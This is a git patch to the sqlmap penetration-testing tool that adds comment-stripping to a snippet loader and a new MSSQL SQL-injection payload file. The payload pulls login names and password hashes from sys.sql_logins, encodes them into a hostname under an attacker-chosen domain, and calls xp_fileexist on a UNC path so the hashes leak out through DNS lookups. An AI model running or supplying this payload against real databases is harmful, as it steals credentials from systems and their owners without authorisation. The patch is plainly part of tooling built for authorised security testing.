From bf923a97df8bb35eb841a9888c741a344b8885a9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 15 Feb 2012 13:45:10 +0000
Subject: [PATCH] minor update

---
 lib/core/common.py          | 2 ++
 procs/mssql_dns_request.txt | 5 +++++
 2 files changed, 7 insertions(+)
 create mode 100644 procs/mssql_dns_request.txt

diff --git a/lib/core/common.py b/lib/core/common.py
index d899d3e1d..c51d9ebe8 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1816,6 +1816,8 @@ def getSPLSnippet(name, **variables):
     checkFile(filename)
     retVal = readCachedFileContent(filename)
 
+    retVal = re.sub(r"#.+", "", retVal)
+
     for _ in variables.keys():
         retVal = re.sub(r"%%%s%%" % _, variables[_], retVal, flags=re.I)
 
diff --git a/procs/mssql_dns_request.txt b/procs/mssql_dns_request.txt
new file mode 100644
index 000000000..b46f6bac9
--- /dev/null
+++ b/procs/mssql_dns_request.txt
@@ -0,0 +1,5 @@
+# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf
+
+DECLARE @host varchar(1024);
+SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
+EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
\ No newline at end of file